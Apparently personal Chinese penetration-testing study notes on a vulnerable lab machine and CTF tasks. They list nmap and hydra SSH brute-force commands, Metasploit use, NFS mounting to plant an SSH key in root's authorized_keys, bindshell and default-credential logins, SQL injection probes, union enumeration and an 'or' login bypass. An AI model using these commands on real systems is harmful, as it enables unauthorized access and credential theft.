1. nmap搜c段

2. 弱密码

> 使用nmap爆破：命令如下：nmap -p 22 --script=ssh-brute --script-args userdb=用户字典,passdb=密码字典 目标机ip

> 使用hydra爆破：

> hydra -l root -P ssh_password.txt   ssh://目标机ip  -v

> nmap -p- -sV -A -T4 192.168.126.131 -oX 131.xml -v

> p- 指的是将目标端口指定为全部有效端口， A 即all oX输出为常用的xml文件  v为verbosity

3. ftp（21）弱密码及2.3.4版漏洞

msfconsole
setg LHISTS ip
setg RHOSTS ip
setg LPORT 7890
search #sea tab
use
run
show info   #sh 
# 可以tab补全

4. appche2.2.8版（80）的php_cgi参数注入漏洞

5. mount挂载（111&&2049） 实现ssh密钥登录
本地创建靶机同uid账号 useradd -u 2008 -d /home/vulnix -m vulnix 后切换以欺骗文件读取操作权限

rpcinfo -p ip
showmount -e ip  
ssh-keygen
mkdir /tmp/13
mount -t nfs ip:/ /tmp/13/
cat ~/.ssh/id_rsa.pub >>/tmp/13/root/.ssh/authorized_keys
unmount /tmp/13
ssh root@ip

6. samba（139）使用usermap id比whoami 好用

7. Rlogin（513）use 免密登录 rlogin -l root ip

8. java-rmi(1099) use java_rmi distcc

9. bindshell(1524) 免密码 nc ip 1524

10. mysql(3306) 空口令

11. postgres 弱口令（5432）

12. vnc 弱口令（5900）

13. irc（6667）use ircd

14. ajp13（8009）匿名访问

15. tomcat（8180）弱口令 tomcat/tomcat

select group_concat(user) from user;
//tables
//columns
//schemata
//注入类型  1"--+a  或 1'--+q  +后必须有非&的任意字符   --为注释
//注入类型  1 and 1=1
//order by  4 判断字段数
//union+select+1,2,3--+p联合查询 前面语句错误union后面的才能执行
//UNION 内部的每个 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每个 SELECT 语句中的列的顺序必须相同。
//+ 代替空格

1. 找到回显位置

/* 整型注入 */
sql-bool.php?name=user1 and 1=1
sql-bool.php?name=user1 and 1=2
/* 字符型注入 */
sql-bool.php?name=user1' and '1'='1
sql-bool.php?name=user1' and '1'='2
/* 字符型注入 */
sql-bool.php?name=user1" and "1"="1
sql-bool.php?name=user1" and "1"="2

2. 爆库

select GROUP_CONCAT(SCHEMA_NAME) from information_schema.SCHEMATA ;
SELECT GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES t ;
SELECT GROUP_CONCAT(COLUMN_NAME) from information_schema.`COLUMNS` c ; 
 
SELECT DATABASE();

通过SQL注入拿到管理员密码

1.目标URL： http://59.63.200.79:8003/?id=1 第一步判断是否存在SQL注入漏洞。 构造 ?id=1 and 1=1 ，回车 这里 %20 代表空格的意思。 页面正常，继续构造 ?id=1 and 1=2 页面不正常，则可以推断该页面存在SQL注入漏洞。 第二步判断字段数 构造?id=1 and 1=1 order by 1 ，回车 页面正常 ， 继续构造 ?id=1 and 1=1 order by 2 ，回车 页面正常， 继续构造 ?id=1 and 1=1 order by 3 ，回车 返回的页面不正常，判断出字段数应该是2。 第三步 判断回显位置 构造 ?id=1 and 1=2

https://www.cnblogs.com/shenggang/p/12144945.html

</div>
<script src="js/common.js"></script> 
<script src="js/play.js"></script> 
<script src="js/AI.js"></script> 
<script src="js/bill.js"></script>
<script src="js/[abcmlyx]{2}ctf[0-9]{3}.js"></script>  
<script src="js/gambit.js"></script>

1. 查看原码

2. 发现奇怪的js
http://5ebb02d9b65e4b9db888a327e72d68abf416a3bb9a8844e0.changame.ichunqiu.com/js/[abcmlyx]{2}ctf[0-9]{3}.js

3. 是个正则的表达式，使用burp suite 爆破

4. 抓包 intruder

5. 注意选择攻击类型为clusterbomb

6. 依次修改变量$1$等

7. 开始攻击

由于网站后台在进行数据库查询的时候没有对单引号进行过滤，当输入用户名【admin】和万能密码【2'or'1】时，执行的SQL语句为【Select user_id,user_type,email From users Where user_id='admin' And password='2'or'1'】。同时，由于SQL语句中逻辑运算符具有优先级，【=】优先于【and】，【and】优先于【or】，且适用传递性。因此，此SQL语句在后台解析时，分成两句【Select user_id,user_type,email From users Where user_id='admin' And password='2'】和【'1'】，两句bool值进行逻辑or运算，恒为TRUE。SQL语句的查询结果为TRUE，就意味着认证成功，也可以登录到系统中